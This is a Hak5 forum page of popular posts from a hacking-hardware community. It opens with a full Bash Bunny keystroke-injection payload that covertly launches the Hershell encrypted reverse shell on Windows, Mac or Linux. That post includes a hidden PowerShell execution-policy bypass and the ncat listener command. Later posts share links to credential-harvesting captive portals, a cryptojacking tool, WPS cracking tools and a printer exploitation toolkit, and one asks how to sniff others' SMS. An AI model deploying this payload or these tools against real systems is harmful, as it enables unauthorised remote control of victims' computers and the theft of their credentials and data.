Hak5 Forums


Popular Content

Showing content with the highest reputation since 03/24/2018 in all areas

  1. 1 point
    Please PM me if there are any issues/improvements. Thanks!

    #!/bin/bash
    # Title: Hershell Encrypted Reverse Shell (Cross-platform - Manual Mode)
    # Author: m3t4lk3y
    # Version: 0.5
    # Target: Windows, Mac OSX, Linux
    # Creds: Ronan Kervella (Creator of Hershell) - https://github.com/sysdream/hershell
    # Instructions:
    # Hershell Github: https://github.com/sysdream/hershell (read all instructions on Hershell git before starting)
    # 1. Compile all payloads and place binaries in the payloads\$SWITCH_POSITION directory (Double check binary names. Defaults are mac32, linux32, win32.exe)
    # 2. Uncomment desired target OS payload lines and ensure others are commented out
    # 3. Start ncat listener on your attacking machine, that is to receive the reverse shell (e.g. ncat --ssl --ssl-cert server.pem --ssl-key server.key -lvp 4343)
    # 4. Execute attack via Bash Bunny

    # SETUP
    DRIVER_LABEL='WINDOWS'          # Drive label for your Bash Bunny
    LED R
    GET SWITCH_POSITION             # Gets switch position (e.g. switch2)
    ATTACKMODE STORAGE HID SERIAL   # Keyboard HID Attack + Storage + Serial

    # Modified RUN helper function
    RUN() {
        local os=$1
        shift
        [[ -z "$os" || -z "$*" ]] && exit 1
        case "$os" in
            WIN)
                QUACK GUI m
                QUACK DELAY 500
                QUACK GUI r
                QUACK DELAY 500
                QUACK STRING cmd.exe
                QUACK DELAY 100
                QUACK ENTER
                QUACK DELAY 500
                QUACK STRING "$@"
                QUACK DELAY 100
                QUACK ENTER
                ;;
            OSX)
                QUACK GUI SPACE
                QUACK DELAY 100
                QUACK STRING terminal
                QUACK DELAY 100
                QUACK ENTER
                QUACK GUI t
                QUACK DELAY 100
                QUACK STRING /bin/bash
                QUACK DELAY 100
                QUACK ENTER
                QUACK STRING "$@"
                QUACK DELAY 100
                QUACK ENTER
                QUACK DELAY 100
                QUACK STRING "exit"
                QUACK DELAY 100
                QUACK ENTER
                QUACK DELAY 100
                QUACK STRING "exit"
                QUACK DELAY 100
                QUACK ENTER
                ;;
            UNITY)
                QUACK ALT F2
                QUACK DELAY 1000
                QUACK STRING xterm
                QUACK DELAY 1000
                QUACK ENTER
                QUACK DELAY 1000
                QUACK STRING /bin/bash
                QUACK DELAY 1000
                QUACK ENTER
                QUACK DELAY 500
                QUACK STRING cd /media/'$USER'
                QUACK DELAY 500
                QUACK ENTER
                QUACK DELAY 500
                QUACK STRING "$@"
                QUACK DELAY 500
                QUACK ENTER
                QUACK DELAY 500
                QUACK STRING "exit"
                QUACK DELAY 500
                QUACK ENTER
                QUACK DELAY 500
                QUACK STRING "exit"
                QUACK DELAY 500
                QUACK ENTER
                ;;
            *)
                exit 1
                ;;
        esac
    }
    export -f RUN

    # START Attack
    LED Y

    # [+] Mac - Uncomment the following lines to use:
    # until ls -halt /dev | head -n 5 | grep -q "nandf"; do sleep 1; done   # Wait for bb to mount
    # LED Y FAST
    # RUN OSX "cp /Volumes/$DRIVER_LABEL/payloads/$SWITCH_POSITION/mac32 /tmp && chmod +x /tmp/mac32 && /tmp/mac32 &"

    # [+] Linux - Uncomment the following lines to use:
    until dmesg | grep -q "sunxi_usb"; do sleep 1; done; sleep 5   # Wait for bb to mount
    LED Y FAST
    RUN UNITY "cd $DRIVER_LABEL/payloads/$SWITCH_POSITION && cp linux32 /tmp/ && chmod +x /tmp/linux32 && /tmp/linux32 &"

    # [+] Windows - Uncomment the following lines to use:
    # until dmesg | grep -q "sunxi_usb"; do sleep 1; done; sleep 5   # Wait for bb to mount
    # LED Y FAST
    # RUN WIN powershell -NoP -NonI -W Hidden -exec bypass ".((gwmi win32_volume -f 'label=''$DRIVER_LABEL''').Name+'\payloads\\$SWITCH_POSITION\win32.exe')"

    # END
    sleep 5
    LED G
    # shutdown 0   # LIGHTS OUT = Shutdown and dismount (if desired)
  2. 1 point
    Just wanted to share a project I've been working on. Currently calling it "WarBox" as the initial intent was for wardriving and mobility. The unit at most only requires one cable for power, or it can be used with certain battery packs. Control connection is made wirelessly, offering SSH and VNC. The main reason for the build was to have a very clean device that had full Linux capabilities for pentesting but in a compact package. It is a single enclosure containing:
    - Raspberry Pi 3 - running Kali 2017.1
    - Two Alfa network adapters
    - GPS module
    - Custom power distribution board
    - Power supply
    - Filtered cooling fan
    Input voltage is 8-26 volts, allowing the use of many sources. The GPS module is configured to work with Kismet for logging while on wardrives. It also has an external power switch that acts as a "main" for the whole device, and I added a power LED for easy visual reference. I plan to soon make a solar battery pack that will mount to the WarBox. I apologize for the poor quality picture and plan to post some more soon. Please share your thoughts on the WarBox!
  3. 1 point
    Hi. I'm searching for a way to sniff any phone's SMS messaging. But I have only found that it is possible with some phones (Samsung S5, S6, Note). Can I sniff any phone with an RTL-SDR antenna & Wireshark?
  4. 1 point
    I had Avira installed on my PC and it blocked the internet sharing.
  5. 1 point
    https://github.com/j0te/bashbunny-payloads/tree/master/payloads/library/prank/FakeUpdate here you are
  6. 1 point
    Should be good, that's all I use.
  7. 1 point
    Something similar to this, I would imagine :) https://github.com/arnaucode/coffeeMiner
  8. 1 point
    Evil Portals: a collection of portals that can be loaded into the Evil Portal module and can be used to capture credentials. Usage and more: https://kbeflo.github.io/evilportals I'd be happy to hear about issues and suggestions. Feel free to ask anything, contribute new templates, and improve the project.
  9. 1 point
    https://ibb.co/gF0E7n is how it is supposed to look
  10. 1 point
    Thanks team, I have been trying to get in more time to practice. You all gave very good answers to my question. This is why I chose Hak5 over the uhhhh competitors' non-existent customer support. A Minipwner OG also reached out to me. So away I go: practice, practice, practice. Thanks again. Peace.
  11. 1 point
    Message me in private (on the forum) I will give you some links to read, watch etc.
  12. 1 point
    I'm also wondering the same thing, I hope someone can chime in and clear it up for us both. Isn't there an Auto-Ethernet command now in firmware 1.5?
    - Added new AUTO_ETHERNET attackmode
    - This attackmode will first attempt to bring up ECM_ETHERNET. If after the default timeout of 20 seconds no connection is established, RNDIS_ETHERNET will be attempted.
    - In addition to AUTO_ETHERNET, ETHERNET_TIMEOUT_XX has been added. This sets the timeout to XX.
  13. 1 point
    Since getting a PacketSquirrel and learning that it would be great to drop behind, amongst other things, printers, it got me thinking. The PacketSquirrel already has some solid tools installed as default, but I figured PRET (Printer Exploitation Toolkit) would be a nice addition.
    Info on PRET: https://github.com/RUB-NDS/PRET
    Recent Black Hat presentation: https://www.blackhat.com/docs/us-17/thursday/us-17-Mueller-Exploiting-Network-Printers.pdf
    Other printer attack info: http://hacking-printers.net/wiki/index.php/Main_Page
    Known vulnerable printer databases here: https://github.com/RUB-NDS/PRET/tree/master/db
    Mine wasn't in the db but worked with PCL, so I'm sure others will work also. After some challenges squeezing it onto the PacketSquirrel without going full extroot, I think I figured it out on the default Squirrel build. I tried adding /mnt as an opkg destination and using links and then pip etc., but in the end a manual install of the Python modules seems to have the lowest footprint. After install it still leaves the PacketSquirrel with 55% of rootfs unused. I'm not 100% sure if this can be "payloaded", but at least for remote SSH access it's a nice tool to have. My problem now is that the printer I borrowed uses PCL, and that in itself is quite restrictive in what can be done with PRET, so I'm kind of out of my testing limit and need other targets to test against, so I'm sharing it here for others to try. The install method I used in the end was to plug my USB drive into my laptop and git clone each of the following to the drive:
    https://github.com/RUB-NDS/PRET
    https://github.com/etingof/pysnmp
    https://github.com/etingof/pysmi
    https://github.com/etingof/pyasn1
    https://github.com/tartley/colorama
    Once cloned, unplug safely and replug back into your Squirrel. Then, EXCLUDING PRET, go into each dir and use Python to install the modules ("python setup.py install"). Afterwards you should be able to run PRET and use its tools from the Squirrel directly.
  14. 1 point
    I've messed with PRET in the past. It is all Python. I would say if the dependencies are met (which I believe are all in Python core) then it should work if the PS has the same dependencies in its core. You could make it an SSH console, but it being Python you could look through the main module to see how it uses its sub-modules and incorporate that into your own interface to use. Hey @Dave-ee Jones, why don't you see how this can be incorporated as a module into that Wrt web interface you made? Would be great as a starter module to get a feel for how users can create their own modules for your system, if you are going that way. :-)
  16. 1 point
    Put SSID filtering and Client filtering both to deny mode (without putting anything inside)
  17. 1 point
    Hi, I'm too shy to use my real name. Chose the pseudonym "enquire" because I'm generally curious about security. Also, I'm not game enough to say my favourite book, etc - seems too close to providing answers to security questions. ;) I've recently loaded a metasploitable vm to learn a few basic skills.
  18. 1 point
    Hi all, Any other players of Thief 1 (Dark Project) and Thief 2 (Metal Age)? I'm playing them both through for the third time in my life now. My God, what amazing games, even over 10 years later! I haven't yet played Thief 2X or any Fan Missions, going to give those a good go after completing The Metal Age again. My favourite games of all time, by far.
  19. 1 point
    That's only needed for the keys stored in the /root/.ssh folder though. I was able to take a Squirrel out of the box, use ssh-copy-id to copy my keys, and SSH in without changing any permissions. Currently you can use AutoSSH, but we are replacing that with SSHTunnel in firmware 1.1.
  20. 1 point
    I don't have the original one, just my modified version from PyDuckGen: Click
  21. 1 point
    Could mod it to have 11 radios. Would be kind of costly though... Might just have to do it for the fun of it!
  22. 1 point
    My suggestion is to not have all your eggs in one basket. Personally, I think the idea of a master vault is the wrong approach with respect to things like passwords and sensitive materials. Tavis Ormandy, for example, has a habit of breaking password managers, mainly to help make them more secure, but nothing is beyond the end user to mess up somewhere, even when using password managers. This only controls one facet of security, the login using a password, where logging in on a system might be bypassed altogether; the vault is only safeguarding one part of the equation. Also, if someone guesses the password without using exploits to access a password manager, there isn't anything you can do to fix that issue once it's discovered, since it's not a flaw, just a weak master password. That said, I think a multi-layered approach, and if required to use a password vault, more than one vault kept in different locations with separate password categories in each, is a better idea. If that means something as simple as an encrypted archive stored remotely or on other hardware separate from your local everyday workstation, then so be it. Add a YubiKey to the mix: more layers. The more the better, but I can almost guarantee no one here is doing 100% best practices at all times. We're human, and we screw up all the time. Ideally, you'd memorize them, but we all know that isn't always possible, as well as not always our choice when system passwords are sometimes set up for us in advance. Safeguarding passwords at the end of the day is as much about self-diligence as it is how to store them securely, because if you can't keep your passwords or data safe without a password vault, chances are there are other things you need to look into securing as well. Best password manager? The one you've kept out of public hands at all times and with no access from anyone other than yourself, which goes to say, vault or no vault, no one should know where or what your passwords are stored in, including advertising what you use here.
  23. 1 point
    Usually it is expensive. https://www.wired.com/2015/11/heres-a-spy-firms-price-list-for-secret-hacker-techniques/ Do you have antivirus software installed? It helps to eliminate free/cheap tools found in public space. So from the hacker's perspective, why would he/she spend the effort & risk getting caught to target you for data that are not worth much? Furthermore, why spend the effort to plant fake Skype messages on your PC? The hacker managed to access your PC and steal data without leaving any trace, but "carelessly" left planted Skype messages? That is highly suspicious. Somebody wants you to take the fall. Can you share the Skype IDs/emails involved in the conversation?
  24. 1 point
    If done correctly, I guess a hack can't be traced technically. So try to disprove the evidence.
    1) Maybe you can prove you weren't near your laptop at the time of one of these Skype incidents.
    2) If there are Skype recordings, maybe they can work in your favor.
    3) If your password was weak at the time (several old passwords may still be in the system), you can claim someone else hacked your account.
    4) Maybe you have obvious enemies, and if they had motive/means/opportunity, you can claim they did this...
    5) Etc...
    Also it may be a good thing to lawyer up, depending on how serious the situation is.
  25. 1 point
    I forgot to mention that the reason you are getting warnings about missing libpcap.so.1.3 when trying to run Reaver/wash/Bully is because those programs are compiled with that version of libpcap. If you want to get rid of those warnings, you would need to either sym-link, or compile Reaver, Bully etc. with the newest libpcap. So I've also compiled Bully and Reaver alongside libpcap-1.8.1. This is not the "normal" version of Bully or Reaver. It's Aanarchyy's and t6x's version, which has added Pixiewps functionality. (Works better in my opinion.) So installing these should let you avoid sym-linking after installing libpcap :)
    Source repos are listed here:
    https://github.com/t6x/reaver-wps-fork-t6x
    https://github.com/aanarchyy/bully
    Links to IPKs below:
    Reaver: https://mega.nz/#!75EikSzL!L0Ux0hhm-R8YvSjHqoZ9wRHxBsiS6VFxW2adkLFuCfE
    Bully: https://mega.nz/#!2oNj0YgA!1PzGr-JxbjPO1DAl4x7SCfCVtg4LtXPk6lLl82V0r8U
    libpcap-1.8.1: https://mega.nz/#!atdFiRLA!gjnqKAxCd2w_2vBTpVstwYkaHbbZE_dSWHe3N1T0kkM